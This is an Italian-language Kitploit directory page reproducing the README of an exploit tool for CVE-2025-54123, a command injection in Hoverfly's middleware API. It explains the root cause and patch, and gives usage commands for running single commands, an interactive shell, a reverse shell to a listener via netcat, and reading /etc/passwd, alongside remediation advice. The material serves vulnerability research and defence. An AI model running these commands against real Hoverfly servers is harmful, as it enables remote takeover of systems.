Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — Exploit per CVE-2025-54123, un'iniezione di comandi OS autenticata nell'API middleware di Hoverfly, che fornisce funzionalità di sola verifica, comando singolo, shell interattiva e reverse shell per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlPaper e RicercaApprendimento e FormazioneRed TeamingSviluppo Payload
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

Exploit per CVE-2025-54123, un'iniezione di comandi OS autenticata nell'API middleware di Hoverfly, che fornisce funzionalità di sola verifica, comando singolo, shell interattiva e reverse shell per test di sicurezza autorizzati.

Vedi Repository
133 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54123 — Esecuzione Remota di Codice tramite API Middleware di Hoverfly

RCE autenticata tramite iniezione di comandi OS in Hoverfly ≤ 1.11.3

Panoramica della Vulnerabilità

ProprietàValore
ID CVECVE-2025-54123
Punteggio CVSS9.8 — Critico
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (OS Command Injection), CWE-20 (Improper Input Validation)
ProdottoHoverfly — Strumento di simulazione API open-source
Versione affettaTutte le versioni fino alla 1.11.3 inclusa
Corretto in1.12.0 (commit della patch)
AvvisoGHSA-r4h8-hfp2-ggmf

Analisi Tecnica

Ecco un'analisi approfondita del case study e un'analisi tecnica dal punto di vista white box e black box https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

Superficie d'Attacco

Hoverfly espone un'API RESTful di amministrazione (porta predefinita 8888) per gestire le configurazioni di simulazione. L'endpoint di gestione del middleware a /api/v2/hoverfly/middleware accetta un corpo JSON con i campi binary e script che definiscono un processo middleware esterno.

Causa Principale

La vulnerabilità nasce da una combinazione di tre difetti a livello di codice:

  1. Validazione degli Input Insufficiente — middleware.go:93-96: La funzione SetBinary() accetta il parametro binary senza alcuna validazione o sanificazione, permettendo a un attaccante di specificare eseguibili arbitrari (es. bash).

  2. Esecuzione di Comandi Non Sicura — local_middleware.go:14-19: Il middleware viene eseguito tramite exec.Command() con i valori di binary e script controllati dall'attaccante passati direttamente come argomenti, abilitando l'iniezione di comandi OS.

  3. Esecuzione Immediata Durante il Test — hoverfly_service.go:173: Quando il middleware viene impostato tramite API, Hoverfly testa immediatamente il middleware eseguendolo, attivando il comando iniettato al momento della configurazione anziché al momento dell'intercettazione del proxy.

Flusso dell'Attacco

root@kitploit:~
Attaccante                            Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) Autentica
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) Inietta payload
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) Esecuzione immediata
   │    │ → il comando dell'attaccante     ││
   │    │   viene eseguito come utente     ││
   │    │   del processo Hoverfly          ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── Output del comando nella risposta  │  (4) Esfiltra output
   │    di errore                           │
   │                                        │

Utilizzo dell'Exploit

Prerequisiti

  • Python 3.8+
  • Credenziali valide per l'API di amministrazione di Hoverfly (predefinite: admin / password configurabile)

Installazione

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

Modalità di Funzionamento

Modalità Solo Controllo

Verifica la raggiungibilità del target e l'autenticazione senza sfruttamento:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -C

Esecuzione di un Singolo Comando

Esegue un singolo comando OS sul target:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

Pseudo-Shell Interattiva

Accede a una sessione shell persistente:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -i

Reverse Shell

Invia una reverse shell al tuo ascoltatore:

root@kitploit:~
# Terminal 1 — start listener
nc -lvnp 4444

# Terminal 2 — launch exploit
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

Modalità Verbosa con Proxy

Instrada il traffico tramite Burp Suite per l'ispezione:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

Riferimento Completo dei Flag

OpzioneDescrizionePredefinito
-u, --urlURL di Hoverfly targetRichiesto
-U, --usernameNome utente amministratoreRichiesto
-P, --passwordPassword amministratoreRichiesto
-c, --commandComando OS da eseguire—
-C, --checkModalità solo controllo (nessuno sfruttamento)false
-i, --interactivePseudo-shell interattivafalse
--revshellReverse shell LHOST:LPORT—
--proxyInstrada tramite 127.0.0.1:8080false
--timeoutTimeout della richiesta (secondi)15
-v, --verboseAbilita output verbosofalse

Rimedio

AzioneDettagli
AggiornamentoAggiornare Hoverfly a v1.12.0 o successiva, dove l'API di impostazione del middleware è disabilitata per impostazione predefinita
Segmentazione di ReteLimitare l'accesso all'API di amministrazione di Hoverfly (porta 8888) solo a reti fidate
AutenticazioneUtilizzare password forti e uniche per l'API di amministrazione di Hoverfly
MonitoraggioMonitorare richieste PUT inaspettate a /api/v2/hoverfly/middleware

Dettagli della Patch

La correzione nel commit 17e60a9 disabilita l'API di impostazione del middleware per impostazione predefinita. Le successive modifiche alla documentazione (commit a9d4da7) rendono gli utenti consapevoli delle implicazioni di sicurezza dell'esposizione di questo endpoint.


Riferimenti

  • NVD — CVE-2025-54123
  • GitHub Security Advisory — GHSA-r4h8-hfp2-ggmf
  • Vulnerable Code — hoverfly_service.go#L173
  • Vulnerable Code — middleware.go#L93
  • Vulnerable Code — local_middleware.go#L13
  • Patch Commit — 17e60a9

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi di ricerca educativa. L'accesso non autorizzato a sistemi informatici è illegale secondo il Computer Fraud and Abuse Act (CFAA) e leggi equivalenti in tutto il mondo. L'autore non si assume alcuna responsabilità per l'uso improprio di questo software. Ottenere sempre autorizzazione esplicita scritta prima di testare qualsiasi sistema di cui non si è proprietari.


Struttura del Progetto

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # Exploit raffinato
│   └── raw_exploit.py      # PoC grezzo originale
├── Images/                 # Screenshot della ricerca
├── Reference/              # Exploit di riferimento per studio
├── requirements.txt        # Dipendenze Python
└── README.md               # Questo file

Autore

Phantom Hat — Ricercatore di Sicurezza


Questa ricerca è stata condotta nell'ambito di un case study di vulnerabilità per scopi educativi.

Scarica lo strumento